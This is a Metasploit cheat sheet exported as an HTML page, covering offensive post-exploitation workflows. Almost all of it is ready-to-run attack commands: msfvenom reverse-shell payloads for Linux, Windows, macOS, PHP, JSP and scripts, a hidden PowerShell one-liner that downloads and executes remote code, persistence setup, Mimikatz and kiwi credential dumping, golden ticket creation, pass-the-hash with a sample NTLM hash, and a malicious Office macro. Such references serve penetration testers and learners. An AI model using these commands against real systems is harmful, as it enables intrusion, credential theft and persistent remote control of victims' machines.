<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Metasploit - CheatSheet</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="739a19fd-4ea1-4fa0-ab32-66797d3e9138" class="page sans"><header><h1 class="page-title">Metasploit - CheatSheet</h1></header><div class="page-body"><p id="7c20d8b1-3017-40d1-a21b-4f401f2926b1" class="">
</p><h1 id="19ec70c1-a8e6-4702-b535-c5a0c787dd5f" class="">Summary</h1><nav id="7e372580-d766-474f-8fbb-816aaa09c2a3" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#19ec70c1-a8e6-4702-b535-c5a0c787dd5f">Summary</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#169262d9-70bf-412f-99da-195ae3dc1d99">Installation</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#8c724df4-1445-412d-be7b-e43113614632">Sessions</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#51378a25-9c35-4843-8b4b-565761368894">Background handler</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#4d719c3c-d1df-4b02-b6e7-d42131d089de">Meterpreter - Basic</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#8ee4b9c1-50f6-4c53-9d63-8f753fa92e3c">Generate a meterpreter</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#65421f07-8530-484c-83cb-d9a8cab63bb7">Meterpreter Webdelivery</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#e2740207-5529-44f6-b709-92d2c95de217">Get System</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#5e275d59-3b19-485d-9002-eb41658256d8">Persistence Startup</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#5b81b8d9-415d-4397-b55a-fa38bc8e926a">Network Monitoring</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#d1b0cde9-dcd7-4aed-b294-11bcb18a2c36">Portforward</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#3306add8-d60b-455c-b30d-04f05d5d1c71">Upload / Download</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#ac26f90c-7de5-45f3-aec3-2003ba4cd6c8">Execute from Memory</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#4640c960-9d00-47f6-ac23-fd7d0aea2a52">Mimikatz</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#c58eacd5-31b8-4ced-becd-a893d652730d">Pass the Hash - PSExec</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#8f9d8527-8609-48a0-a7b2-5f4a53eb5756">Scripting Metasploit</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#31fb9197-e0e5-47f9-8aa8-1c87c967f6de">Multiple transports</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#f7dea575-0182-434f-ae9a-ccbaa95547e3">Best of - Exploits</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#9884c29c-48fa-4c22-80ba-8d77204c3e27">References</a></div></nav><h2 id="169262d9-70bf-412f-99da-195ae3dc1d99" class="">Installation</h2><pre id="c5989345-f8dc-4202-8da5-ba9c8498e6fb" class="code"><code>curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &gt; msfinstall &amp;&amp; chmod 755 msfinstall &amp;&amp; ./msfinstall</code></pre><p id="cfcfc7dc-6bf3-43c4-b0f9-2aa8d8f58003" class="">or docker</p><pre id="14a2cd8c-de79-4205-af04-32eb70b20523" class="code"><code>sudo docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit</code></pre><h2 id="8c724df4-1445-412d-be7b-e43113614632" class="">Sessions</h2><pre id="8c2f7947-7c7d-4da8-9106-90159188ffac" class="code"><code>CTRL+Z   -&gt; Session in Background
sessions -&gt; List sessions
sessions -i session_number -&gt; Interact with Session with id
sessions -u session_number -&gt; Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-&gt; Upgrade session to a meterpreter

sessions -c cmd           -&gt; Execute a command on several sessions
sessions -i 10-20 -c &quot;id&quot; -&gt; Execute a command on several sessions</code></pre><h2 id="51378a25-9c35-4843-8b4b-565761368894" class="">Background handler</h2><p id="d17c0512-5548-4949-af07-98b39a164868" class="">ExitOnSession : the handler will not exit if the meterpreter dies.</p><pre id="be9008b8-a01c-43cc-816e-6b4000188645" class="code"><code>screen -dRR
sudo msfconsole

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false

generate -o /tmp/meterpreter.exe -f exe
to_handler

[ctrl+a] + [d]</code></pre><h2 id="4d719c3c-d1df-4b02-b6e7-d42131d089de" class="">Meterpreter - Basic</h2><h3 id="8ee4b9c1-50f6-4c53-9d63-8f753fa92e3c" class="">Generate a meterpreter</h3><pre id="57f39646-4a77-4a29-b2a5-fb058f928312" class="code"><code>$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f elf &gt; shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f exe &gt; shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f macho &gt; shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f raw &gt; shell.php; cat shell.php | pbcopy &amp;&amp; echo &#x27;&lt;?php &#x27; | tr -d &#x27;\n&#x27; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f asp &gt; shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f raw &gt; shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f war &gt; shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f raw &gt; shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f raw &gt; shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST=&quot;10.10.10.110&quot; LPORT=4242 -f raw &gt; shell.pl</code></pre><h3 id="65421f07-8530-484c-83cb-d9a8cab63bb7" class="">Meterpreter Webdelivery</h3><p id="d33922b0-d7d6-4e3e-b7e7-56b1829e84fa" class="">Set up a Powershell web delivery listening on port 8080.</p><pre id="7cf1c805-0e53-449b-83b1-1a53cde6701b" class="code"><code>use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run</code></pre><pre id="0950ad27-d193-4f7d-b384-4ac65313665d" class="code"><code>powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring(&#x27;http://10.0.0.1:8080/rYDPPB&#x27;);</code></pre><h3 id="e2740207-5529-44f6-b709-92d2c95de217" class="">Get System</h3><pre id="c8e8812f-162d-4f7f-b5b9-6d1dae6f94ea" class="code"><code>meterpreter &gt; getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter &gt; getuid
Server username: NT AUTHORITY\SYSTEM</code></pre><h3 id="5e275d59-3b19-485d-9002-eb41658256d8" class="">Persistence Startup</h3><pre id="b9b9c00d-722d-4b98-b5f5-b6045fd6d251" class="code"><code>OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L &lt;opt&gt;  Location in target host to write payload to, if none %TEMP% will be used.
-P &lt;opt&gt;  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T &lt;opt&gt;  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i &lt;opt&gt;  The interval in seconds between each connection attempt
-p &lt;opt&gt;  The port on which the system running Metasploit is listening
-r &lt;opt&gt;  The IP of the system running Metasploit listening for the connect back

meterpreter &gt; run persistence -U -p 4242</code></pre><h3 id="5b81b8d9-415d-4397-b55a-fa38bc8e926a" class="">Network Monitoring</h3><pre id="21b6f2c4-e01b-4296-adab-55fa3b0f5997" class="code"><code># list interfaces
run packetrecorder -li

# record interface n°1
run packetrecorder -i 1</code></pre><h3 id="d1b0cde9-dcd7-4aed-b294-11bcb18a2c36" class="">Portforward</h3><pre id="e154d106-90dd-48be-9b08-7b9808b272f2" class="code"><code>portfwd add -l 7777 -r 172.17.0.2 -p 3006</code></pre><h3 id="3306add8-d60b-455c-b30d-04f05d5d1c71" class="">Upload / Download</h3><pre id="bb3b159a-2c79-4e4e-95a7-f28c6e80cbd8" class="code"><code>upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim</code></pre><h3 id="ac26f90c-7de5-45f3-aec3-2003ba4cd6c8" class="">Execute from Memory</h3><pre id="4e1c1139-1a11-44fa-ae61-ab47eaa2481d" class="code"><code>execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w</code></pre><h3 id="4640c960-9d00-47f6-ac23-fd7d0aea2a52" class="">Mimikatz</h3><pre id="73965e8b-d946-48c9-820d-f14cbb529266" class="code"><code>load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full</code></pre><pre id="f4fc2577-5594-42fa-bc7a-a936d63c4f33" class="code"><code>load kiwi
creds_all
golden_ticket_create -d &lt;domainname&gt; -k &lt;nthashof krbtgt&gt; -s &lt;SID without le RID&gt; -u &lt;user_for_the_ticket&gt; -t &lt;location_to_store_tck&gt;</code></pre><h3 id="c58eacd5-31b8-4ced-becd-a893d652730d" class="">Pass the Hash - PSExec</h3><pre id="340d2e33-cce6-4fca-ba07-ad8be965bb2f" class="code"><code>msf &gt; use exploit/windows/smb/psexec
msf exploit(psexec) &gt; set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) &gt; exploit
SMBDomain             WORKGROUP                                                          no        The Windows domain to use for authentication
SMBPass               598ddce2660d3193aad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf  no        The password for the specified username
SMBUser               Lambda                                                             no        The username to authenticate as</code></pre><h2 id="8f9d8527-8609-48a0-a7b2-5f4a53eb5756" class="">Scripting Metasploit</h2><p id="35427a82-bfa3-420f-bfc3-d71b610cfd86" class="">Using a <code>.rc file</code>, write the commands to execute, then run <code>msfconsole -r ./file.rc</code>. Here is a simple example to script the deployment of a handler an create an Office doc with macro.</p><pre id="5bca43e5-5168-45ce-a76c-4b8bcf7cc46c" class="code"><code>use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4646
set ExitOnSession false
exploit -j -z


use exploit/multi/fileformat/office_word_macro 
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.10.14.22
set LPORT 4646
exploit</code></pre><h2 id="31fb9197-e0e5-47f9-8aa8-1c87c967f6de" class="">Multiple transports</h2><pre id="d6077128-06aa-4bc6-b396-8a9f6854dd26" class="code"><code>msfvenom -p windows/meterpreter_reverse_tcp lhost=&lt;host&gt; lport=&lt;port&gt; sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe</code></pre><p id="ea3adf0b-557b-46dc-a400-ae4167975f7f" class="">Then, in AddTransports.ps1</p><pre id="14142194-9e72-444a-8894-592f344daea9" class="code"><code>Add-TcpTransport -lhost &lt;host&gt; -lport &lt;port&gt; -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http(s)://&lt;host&gt;:&lt;port&gt;/&lt;luri&gt; -RetryWait 10 -RetryTotal 30</code></pre><h2 id="f7dea575-0182-434f-ae9a-ccbaa95547e3" class="">Best of - Exploits</h2><ul id="fb1c52a5-f267-4b49-b38a-0b078a349a2d" class="bulleted-list"><li>MS17-10 Eternal Blue - <code>exploit/windows/smb/ms17_010_eternalblue</code></li></ul><ul id="c4aa0431-1d86-48c2-a086-3872a8e79c8d" class="bulleted-list"><li>MS08_67 - <code>exploit/windows/smb/ms08_067_netapi</code></li></ul><h2 id="9884c29c-48fa-4c22-80ba-8d77204c3e27" class="">References</h2><ul id="7292c814-a82c-4503-b4d6-0c3ad71073f4" class="bulleted-list"><li><a href="https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/">Multiple transports in a meterpreter payload - ionize</a></li></ul><ul id="6cd968d5-6622-4d00-a4d6-2372a8f4d242" class="bulleted-list"><li><a href="https://netsec.ws/?p=331">Creating Metasploit Payloads - Peleus</a></li></ul></div></article></body></html>